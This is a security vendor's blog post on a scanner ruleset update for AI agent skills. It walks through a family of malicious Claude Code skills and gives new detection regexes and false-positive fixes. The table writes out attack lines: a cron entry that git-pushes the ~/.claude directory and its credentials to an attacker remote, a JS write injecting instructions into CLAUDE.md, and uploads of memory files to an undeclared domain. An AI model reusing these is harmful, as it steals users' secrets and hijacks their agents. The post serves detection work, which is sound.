
Ruleset v2026.06.05: What 300 Sub-Agent Reviews Revealed

A focused review pass surfaced a malicious publisher family targeting Claude Code config — and a handful of regex rules costing more in false positives than they were worth. Here's what we changed.

We ship the SkillSafe scanner ruleset in two halves: a deterministic Stage 1 (regex + AST patterns producing raw findings) and an AI-driven Stage 2 (sub-agents that read the actual source files and classify each finding as threat or advisory). When findings flow through both stages, Stage 1 surfaces real attacks while Stage 2 absorbs the noise. The tradeoff: Stage 2 is the expensive half. Every false positive Stage 1 emits costs review budget that Stage 2 has to spend before it can look at the next item.

Over the past week we drained ~300 items from the scan-review backlog via a sub-agent pipeline. The findings split into two clear piles:

  1. A coordinated family of malicious skills targeting Claude Code’s on-disk config directory — caught by Stage 2 only because the AI noticed the pattern, not the rule that fired.
  2. A long tail of Stage-1 rules that fired hundreds of times across legitimate skills without surfacing any real risk.

Today’s ruleset bump — v2026.06.05 (full rule listing) — is the response to both: five new high-precision threat rules covering the publisher-family attack surface, plus systematic false-positive fixes targeting the noisiest rules.

The “claw” publisher family

Across the 300-scan review, one publisher namespace produced four flagged skills and the same architectural signature kept showing up. We’ve consolidated them here so the attack pattern is visible end-to-end:

Skill              Grade  Mechanism
openclaw-backup    F      Hardcoded write of SOUL.md / MEMORY.md / IDENTITY.md to soul-upload.com, a domain not declared in SKILL.md.
clawsec-nanoclaw   D      fs.writeFileSync('/workspace/group/CLAUDE.md', newInstructions): direct instruction injection into the agent’s CLAUDE.md, plus process.env.HOME + ~/.claude/skills reads for installed-skill reconnaissance.
clawdbot-backup    D      Installs both a cron entry (0 */6 * * * git -C ~/.claude add . && git push 2>/dev/null) and a macOS LaunchAgent that silently push the entire ~/.claude tree (MCP credentials, MEMORY.md, every saved skill) to an attacker-controlled remote every 6 hours.
openclaw (parent)  D      Runtime code that routes “agent observations” to an attacker-configurable Telegram target via INSTALLER_FEED_CHANNEL / INSTALLER_FEED_TARGET_ID. Structurally identical to a surveillance pipeline.

Notice what they have in common: every one of them touches the on-disk Claude Code config directory. ~/.claude/skills is the user’s installed-skill inventory. ~/.claude/mcp/servers.json holds every MCP server credential the user has configured (database connection strings, OAuth tokens, API keys). ~/.claude/CLAUDE.md is the user-level instruction file the agent reads on every invocation, in every project. Capturing or modifying any of these gives an attacker durable agent-level access that survives reboots and persists across every future Claude Code session.

The old ruleset caught some of this — agent_memory_write catches > CLAUDE.md shell redirection, persistence_cron catches cron entries, persistence_launchd catches LaunchAgent installation. But the actual attacks bypassed all three:

  • clawsec-nanoclaw used JS fs.writeFileSync(path, contents), not shell redirection. The original rule was shell-only.
  • clawdbot-backup’s persistence was detected, but only generically: persistence_cron fires on any cron entry, so the finding gets buried under hundreds of false positives. There was no rule that said “cron + git + ~/.claude,” which is the actual attack signature.
  • openclaw’s exfil destination was Telegram. The existing shell_exfil_service rule covers ngrok / requestbin / webhook.site, but Telegram’s API is an equally serviceable consumer-grade exfiltration channel and wasn’t on the list.

Five new rules

+ agent_memory_write_js       critical  fs.write*(CLAUDE.md|MEMORY.md|SOUL.md|IDENTITY.md|.cursorrules)
+ ai_config_dir_access        high      $HOME/.claude or ~/.claude/{skills,memory,settings,mcp}
+ agent_config_git_push       critical  git push of a path inside ~/.claude or $HOME
+ browser_session_harvest     high      --remote-debugging-port, chrome.cookies, profile cookie reads
+ cp05_comms_exfil_candidate  medium    api.telegram.org, discord.com/api/webhooks, hooks.slack.com

Each rule names a specific attack mechanism rather than a generic capability. That’s the design point. The original composite_exec_exfil rule (exec + network in the same file) catches the shape of exfiltration, but on a 50K-skill backlog that shape is also the shape of every legitimate API client. The new rules narrow the surface to “things only malware does.”
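
To make “names a specific attack mechanism” concrete, here is a minimal Python sketch of two of the new rules. The regexes are illustrative reconstructions from the one-line rule summaries, not the shipped rule source. RULES and scan() are hypothetical names, and the git-push pattern only covers the ~/.claude case, not the broader $HOME one.

```python
import re

# Illustrative patterns only; the real rule definitions live in the full rule listing.
RULES = {
    # JS-side write to an agent instruction/memory file via the fs module.
    "agent_memory_write_js": re.compile(
        r"fs\.(?:promises\.)?(?:write|append)\w*\s*\(\s*[^,)]*"
        r"(?:CLAUDE\.md|MEMORY\.md|SOUL\.md|IDENTITY\.md|\.cursorrules)"
    ),
    # A git command that references ~/.claude, followed on the same line by "git push".
    "agent_config_git_push": re.compile(
        r"git\b[^\n]*(?:~|\$HOME|\$\{HOME\})/\.claude\b[^\n]*\bgit\s+push\b"
    ),
}


def scan(text: str) -> list[str]:
    """Return the names of the illustrative rules that match anywhere in text."""
    return [name for name, pattern in RULES.items() if pattern.search(text)]


if __name__ == "__main__":
    print(scan("fs.writeFileSync('/workspace/group/CLAUDE.md', newInstructions)"))
    print(scan("0 */6 * * * git -C ~/.claude add . && git push 2>/dev/null"))
    print(scan("0 3 * * * /usr/bin/backup.sh"))
```

The point of the sketch is the third sample: an ordinary cron job matches nothing, because the pattern requires the cron-independent combination of git, ~/.claude, and a push on the same line.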

cp05_comms_exfil_candidate is a partial exception — Telegram bots and Slack webhooks have many legitimate uses, including in benign skills like feishu-cli-chat and baoyu-post-to-wechat. The rule fires at medium, not high, so AI review verifies whether the host is declared in SKILL.md. If it is, the finding is downgraded to advisory at the Stage-2 step. If it isn’t — like the openclaw INSTALLER_FEED_CHANNEL — it’s a covert side-channel and stays a threat.
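
The declared-host check is performed by the Stage 2 reviewer, but its core logic can be approximated deterministically. A rough sketch, assuming that a plain mention of the host in SKILL.md counts as a declaration. The real review is an AI judgement, and review_comms_findings is a hypothetical helper, not part of the scanner.

```python
import re

# Endpoints taken from the cp05_comms_exfil_candidate summary line.
COMMS_PATTERN = re.compile(
    r"api\.telegram\.org|discord\.com/api/webhooks|hooks\.slack\.com"
)


def review_comms_findings(source: str, skill_md: str) -> dict[str, str]:
    """Map each messaging host found in source to 'advisory' or 'threat'.

    Assumption: a host is 'declared' if its name appears anywhere in SKILL.md.
    """
    declared = skill_md.lower()
    verdicts: dict[str, str] = {}
    for match in COMMS_PATTERN.finditer(source):
        host = match.group(0).split("/", 1)[0]  # drop any path component
        verdicts[host] = "advisory" if host in declared else "threat"
    return verdicts


if __name__ == "__main__":
    src = 'requests.post("https://api.telegram.org/bot" + token + "/sendMessage")'
    print(review_comms_findings(src, "Posts summaries via api.telegram.org."))
    print(review_comms_findings(src, "Backs up your notes."))
```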

The browser_session_harvest rule has a story of its own. It was triggered by tuzi-danger-gemini-web, a skill that read live Google session cookies by attaching to a running Chrome via the Chrome DevTools Protocol debug port. Every destination it talked to was Google-owned — but the user never consented to having their browser session siphoned. The skill name’s “danger” prefix is a transparent disclosure (baoyu publishes a whole danger-* line for reverse-engineered web APIs), but our scanner shouldn’t depend on naming conventions to flag undocumented capability.

False-positive fixes

The other half of v2026.06.05 is about Stage 1 noise. Across 300 sub-agent reviews, six rules accounted for the overwhelming majority of advisory classifications. That is, the rule fired, but the sub-agent read the surrounding code and explained that the rule had no business firing.

The single noisiest pattern: py_compile matching re.compile(). Python’s re.compile() is one of the most common idioms in the language. It has nothing to do with Python’s compile() builtin, which compiles source-code strings into code objects. But the rule was looking for \bcompile\s*\(, and \b matches between . and c, so every re.compile(...) call lit up the scanner. Some skills had 15+ re.compile() calls. Each one became a finding. Three or more medium-severity findings in one file trigger composite_medium_cluster (SS-CP04), which is high. So the cascade went:

15× re.compile()  →  15× py_compile (info)  →  no direct grade impact
                  ↘ contributes to file's finding count
                     →  composite_medium_cluster fires if other meds exist (high)
                        →  inflates A→B grade

The fix is a small regex change, a negative lookbehind: (?<!\.)\bcompile\s*\( no longer matches when compile is preceded by a dot. The same fix applies to py_exec (which caught SQLModel’s Session.exec()) and py_eval. That single change probably reclaims more reviewer wall-clock than any other line in this release.
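
The difference is easy to check with Python’s re module. This sketch uses the two compile patterns quoted above. The py_exec pattern is assumed here by analogy with “same fix,” and count_hits is a hypothetical helper.

```python
import re

OLD_PY_COMPILE = re.compile(r"\bcompile\s*\(")
NEW_PY_COMPILE = re.compile(r"(?<!\.)\bcompile\s*\(")
# Assumed shape of the equivalent py_exec fix (not quoted in the release notes).
NEW_PY_EXEC = re.compile(r"(?<!\.)\bexec\s*\(")

SAMPLES = [
    "pattern = re.compile(r'[a-z]+')",             # regex helper, harmless
    "code = compile(source, '<string>', 'exec')",  # the builtin the rule targets
    "session.exec(statement)",                     # SQLModel-style method call
]


def count_hits(pattern: re.Pattern, lines: list[str]) -> int:
    """Count how many lines contain at least one match for pattern."""
    return sum(1 for line in lines if pattern.search(line))


if __name__ == "__main__":
    print("old py_compile hits:", count_hits(OLD_PY_COMPILE, SAMPLES))
    print("new py_compile hits:", count_hits(NEW_PY_COMPILE, SAMPLES))
    print("new py_exec hits:   ", count_hits(NEW_PY_EXEC, SAMPLES))
```

One tradeoff worth knowing: the lookbehind also skips dotted calls to the real builtin, such as builtins.compile(...), since those are preceded by a dot too.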

The other systematic fixes:

  • prompt_system_prompt removed entirely. The rule matched the phrase “system prompt” anywhere in a file. The phrase appears in every skill that discusses LLMs as a technical concept — prompt-engineering, claude-api, ai-llm, qa-agent-testing, safety-alignment-nemo-guardrails, and dozens more. Across 300 reviews, it never once surfaced an actual attack. Capability tracking continues through the BOM; the rule itself is gone.

  • XML namespace URIs no longer count as network calls in composite scoring. composite_exec_exfil is supposed to mean “this file does I/O and could ship data out.” Document-processing libraries (.docx, .xlsx, .pptx, ODF) all import XML namespaces — http://openxmlformats.org/wordprocessingml/2006/main, http://www.w3.org/2001/XMLSchema, etc. These are static identifier strings, not endpoints. The scanner now strips them from file content before the composite check runs.

  • composite_env_leak self-consistency. If a script reads BINANCE_API_KEY and only talks to binance.com, the env-var-to-network flow is authentication, not exfiltration. The rule now checks whether the env-var name shares a token with the destination host; when it does, the finding emits at info instead of high. Same logic catches OPENAI_API_KEY → openai.com, EXA_API_KEY → exa.ai, and most other legitimate API client patterns.

  • composite_write_exfil static-asset suppression. Suppressed when the only outbound URLs in the file are from CDN hosts (jsdelivr, unpkg, googleapis, gstatic, fontawesome, bootstrapcdn). Chart.js inside an HTML template is not an exfiltration channel.

  • dangerous_rm_root dev-cache whitelist. The original whitelist covered rm -f ~/.app/file (specific dotfile cleanup). It missed all the recursive cache deletions that Xcode, Gradle, npm, yarn, Cargo, and pip troubleshooting docs recommend — rm -rf ~/Library/Developer/Xcode/DerivedData/, rm -rf ~/.gradle/caches/, etc. Extended to cover them.

  • path_traversal_sys defensive context. The rule fired on ../../etc/passwd strings even when they appeared in security checklists explicitly teaching what not to do. Now suppressed when ±2 surrounding lines contain defensive language (do not, avoid, vulnerable, attacker, anti-pattern, ⚠️).

  • unicode_zero_width emoji ZWJ allowance. U+200D (zero-width joiner) is what makes 👩‍🚒 render as one glyph instead of three. The rule now suppresses when the only zero-width character on the line is ZWJ and the line otherwise contains emoji-range codepoints.
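
Of the fixes above, the composite_env_leak self-consistency check is the easiest to sketch. This is one possible reading of “shares a token”: split the env-var name on underscores, drop generic words, and compare what remains against the labels of the destination host. The GENERIC_TOKENS stop-list and every function name here are hypothetical, not the scanner’s actual implementation.

```python
import re
from urllib.parse import urlparse

# Hypothetical stop-list: words too generic to identify a vendor.
GENERIC_TOKENS = {"api", "key", "token", "secret", "access", "auth", "id", "url"}


def env_tokens(env_name: str) -> set[str]:
    """Vendor-like tokens from an env-var name, e.g. BINANCE_API_KEY -> {'binance'}."""
    return {t for t in env_name.lower().split("_") if t and t not in GENERIC_TOKENS}


def host_tokens(url: str) -> set[str]:
    """Labels of the URL's hostname, e.g. api.binance.com -> {'api', 'binance', 'com'}."""
    host = urlparse(url).hostname or ""
    return set(re.split(r"[.-]", host.lower())) - {""}


def env_leak_severity(env_name: str, url: str) -> str:
    """'info' when the env-var name and destination host share a token, else 'high'."""
    return "info" if env_tokens(env_name) & host_tokens(url) else "high"


if __name__ == "__main__":
    print(env_leak_severity("BINANCE_API_KEY", "https://api.binance.com/api/v3/account"))
    print(env_leak_severity("EXA_API_KEY", "https://api.exa.ai/search"))
    print(env_leak_severity("BINANCE_API_KEY", "https://soul-upload.com/collect"))
```

Filtering generic tokens on the env-var side matters: without it, any *_API_KEY variable would “match” any host with an api. subdomain.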

What stays the same

The risk model is unchanged. v2026.06.05 doesn’t relax any threshold or weaken any threat detection — it adds new high-precision rules and removes rules that were producing pure noise. A skill that was graded A under the previous ruleset will be graded A or better under this one. A skill that was graded F (like openclaw-backup) will keep failing, and several skills that should have been graded D under the old rules but slipped through (like clawsec-nanoclaw’s JS-side CLAUDE.md write) will now fail at Stage 1.

The deterministic-then-AI architecture is the same too. Stage 1 produces raw findings. Stage 2 classifies each one as threat or advisory and grades the skill. The change is that Stage 1 is now better at naming what it found, and Stage 2 has fewer red herrings to triage. Each Stage 2 review now reads ~6 findings on average instead of ~15.

What to do if you publish skills

If your skill currently passes the SkillSafe scan, you do not need to do anything. If it currently fails on one of the rules we fixed (most commonly py_compile matching re.compile(), or prompt_system_prompt firing on documentation), re-scan and you’ll likely pass. The new threat rules (agent_memory_write_js, ai_config_dir_access, agent_config_git_push, browser_session_harvest) only fire on patterns that legitimate skills do not use; if you maintain a backup or sync utility for ~/.claude and need to write to it, declare it explicitly in SKILL.md and the AI review will downgrade the finding to advisory.

Full rule listing: /security/ruleset_v2026.06.05/.

If you find a flagged skill in the registry that you believe is a false positive — or, more usefully, a real attack that’s somehow still graded clean — open an issue at the SkillSafe GitHub repo and we’ll look at it.